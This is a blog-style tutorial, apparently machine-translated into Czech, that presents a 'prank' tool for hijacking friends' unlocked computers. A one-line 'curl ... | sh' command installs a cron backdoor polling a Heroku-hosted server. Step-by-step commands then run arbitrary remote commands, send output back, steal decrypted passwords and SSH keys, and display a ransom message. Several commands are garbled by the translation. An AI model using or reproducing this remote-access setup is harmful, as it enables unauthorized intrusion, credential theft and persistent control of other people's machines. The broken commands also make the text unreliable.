Jak hacknout své přátele

Moji přátelé často nechávají své počítače otevřené a odemčené. Říkám jim, že by si měli pravděpodobně zvyknout na zamykání svých počítačů, ale neposlouchají mě. Takže jsem vytvořil jednoduchý projekt, který hacknul mým přátelům a ukázal jim důležitost počítačové bezpečnosti.

Vše, co musím udělat, je čekat, až opustí počítač na několik sekund, odemknou terminál a zadají jediný krátký příkaz.

A je to! Jejich počítač je nyní infikován a mohu na tomto počítači vzdáleně spouštět jakékoli příkazy, které chci. Docela milé, že? Nebo možná šokující?

Hacking je nezákonný. Konkrétně:

„Záměrně přistupovat k počítači bez oprávnění nebo překračovat autorizovaný přístup“ - Zákon o počítačových podvodech a zneužívání (18 U.S.C. 1030)

Takže mějte na paměti, že účelem tohoto článku je ukázat vám, jak snadné by pro někoho se špatnými úmysly hacknout vás, abyste se mohli vyhnout hackování sami.

Trpět životem netrpí hackerským géniem - každý „ledvinový skript“, který může získat fyzický přístup k vašemu počítači, vás může ohrozit stažením skriptu obsahujícího pouze 50 řádků kódu.

Získání nastavení

Celý kód tohoto projektu žije v tomto úložišti, pokud chcete skočit přímo dovnitř, ale vysvětlím vám, jak to funguje níže.

Nejprve stačí klonovat repo, nainstalovat jeho závislosti a zkompletovat nástroj rozhraní příkazového řádku hack (CLI).

klon git https://github.com/ccorcos/hack.git
git vzdálené odstranění původu
cd hack
Npm instalace
npm link

Dále musíte Heroku nastavit tak, aby hostoval skripty, které budou spuštěny na vašem počítači přátel. Pokud jste Heroku ještě nikdy nepoužívali, zaregistrujte se zde (je to zdarma!) A nastavte na svém počítači nástroj CLI.

vařit instalaci heroku-toolbelt
heroku přihlášení

Nyní uvnitř hack repo vytvořte aplikaci Heroku se snadno zapamatovatelným jménem. Používám hackerský chet.

heroku vytvořit hacker-chet

Pak je třeba spustit příkaz, abyste provedli malé nastavení. Všechno, co opravdu dělá, je získat kořenovou adresu URL pro váš web Heroku a vložit jej do souboru package.json. Server tak může do skriptů prostředí vložit adresu URL aplikace.

npm run init

Pokud chcete hacknout sami sebe a vyzkoušet věci, můžete server spustit lokálně.

npm start

Nebo můžete nasadit na Heroku.

npm run nasadit

Nyní jste připraveni na hack!

Hack API

Krása tohoto programu spočívá v tom, že pokud chcete někoho napadnout, stačí na jeho počítači spustit jediný příkaz.

curl  / hack | sh

ROOT_URL je konkrétní cesta k vaší aplikaci. Když server provozujete lokálně, bude to localhost: 5000 a při nasazení na Heroku to bude něco jako .herokuapp.com.

Co to dělá, je vytvoření úlohy cron - „chronologické práce“, která v určitém čase znovu spustí úkoly - každou minutu pinguje koncový bod / env / live a výsledkem je shsh. Je to vlastně docela jednoduché! A Heroku vám dává HTTPS zdarma, takže je jeho „bezpečné“, že?

Jakmile hacknete svého přítele, můžete pomocí nástroje příkazového řádku z počítače dělat všechno ostatní.

Nástroj hack obsahuje koncept různých hackovaných prostředí. Když někoho hacknete pomocí koncového bodu / hack, začne tato osoba v živém prostředí. A pro každé prostředí můžete spouštět různé příkazy. Vše předvedu malým průchodem.

Následující text přepíše skript prostředí živého prostředí a provede následující příkaz, který nahlas řekne „Sleduji vás.“

hack live exec "řekni" sleduji tě "

No, ještě to nebude fungovat, stále musíte znovu nasadit do své aplikace Heroku.

hack rozmístit

Nyní počkejte další minutu a sledujte, jak počítač vašeho přítele pinguje váš server sledováním protokolů serveru.

hack protokoly

Celým bodem prostředí je, že můžete hacknout více lidí současně. Chcete-li izolovat lidi v různých prostředích, stačí změnit jméno.

hack live přejmenovat jon

Až bude živé prostředí pingováno, přepíše úlohu cron a místo toho začne pingovat prostředí jon.

Všechno to samé můžete udělat jen změnou argumentu prostředí.

hack jon exec "say 'ahoj jon'"

Nyní, pokud jste si užili dost zábavy pro celý den a po skončení večírku, můžete Jonovi zapomenout a ujistit ho, že jste ho „nezranili“.

hack jon zapomenout

Tím vymažete úlohu cron ze svého počítače. Nebo můžete chtít umístit toto prostředí do režimu spacích buněk, abyste je mohli později obnovit.

hack jon interval 1d

Nyní, spíše než pingování serveru každou minutu (výchozí), bude ping každý den o půlnoci. A když ji chcete probudit, můžete interval změnit zpět na každou minutu a další den, je dobré jít!

hack jon interval 1m

Mezi další zábavné věci patří nastavení dalších cronových úloh. Zde je návod, jak můžete probudit svého přítele každé ráno v 6 hodin, aby mu připomněl zabezpečení počítače.

hack jon cron "0 6 * * * řekni" dobré ráno jon, pamatuješ, co jsem ti řekl o uzamčení počítače? ""

P.S. Pokud si nepamatujete, jak práce cronu fungují, je to skvělý zdroj. Skoro všechno jde dolů k tomuto malému diagramu.

* * * * *
| | | | |
| | | | |
| | | | + ---- Den v týdnu (rozsah: 1-7, 1 stát v pondělí)
| | | + ------ Měsíc roku (rozmezí: 1-12)
| | + -------- Den v měsíci (rozmezí: 1-31)
| + ---------- hodina (rozsah: 0-23)
+ ------------ Minuta (rozsah: 0-59)

Jedním z mých oblíbených je předvolba na ploše, která stáhne obrázek z dané adresy URL a nastaví jej jako fotografii na pozadí.

hack jon preset desktop http://i.imgur.com/5FC2r9R.jpg

A pokud jste napsali tunu cronových úloh a nevíte, co se tam ještě děje, můžete použít příkaz dump.

hack jon dump "crontab -l"

Nyní bič otevřete své protokoly a uvidíte výstup na dalším pingu. To je vlastně mnohem zlověstnější nyní, když můžete získat informace zpět. Pokud jste chtěli být více nebezpeční, můžete hledat dešifrovaná hesla nebo ukrást jejich ssh klíče.

hack přednastavená hesla
hack jon preset ssh

Ale pokud mu jen chcete dát staromódní vyděšení, pošlete mu výkupné!

hack jon preset výkupné "Ahoj Jon, řekl jsem ti, abys nenechával počítač odemčený."

A konečně, pokud zjistíte, že přidáváte spoustu cronových úloh a chcete začít znovu, reset vám pomůže.

hack jon reset

Nyní se bavte (odpovědnou) zábavou s touto věcí a dejte mi vědět, jaké jsou vaše oblíbené žerty podáním žádosti o vyžádání s novým příkazem nebo předvolbou!

Happy Hacking!